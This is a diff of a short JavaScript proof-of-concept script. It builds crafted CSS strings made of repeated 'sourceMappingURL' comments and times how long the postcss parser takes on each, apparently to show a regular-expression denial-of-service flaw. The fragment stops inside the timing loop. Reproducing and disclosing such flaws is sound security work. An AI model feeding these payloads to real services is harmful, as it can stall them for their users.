@@ -3,16 +3,16 @@ var postcss = require("postcss")
 const startTime = Date.now();
 
 function build_attack(n) {
-    var ret = "a{}/*# sourceMappingURL="
+    var ret = "a{}"
     for (var i = 0; i < n; i++) {
-        ret += " "
+        ret += "/*# sourceMappingURL="
     }
     return ret + "!";
 }
 
 // postcss.parse('a{}/*# sourceMappingURL=a.css.map */')
 for(var i = 1; i <= 500000; i++) {
-    if (i % 10000 == 0) {
+    if (i % 1000 == 0) {
         var time = Date.now();
         var attack_str = build_attack(i)
         try{
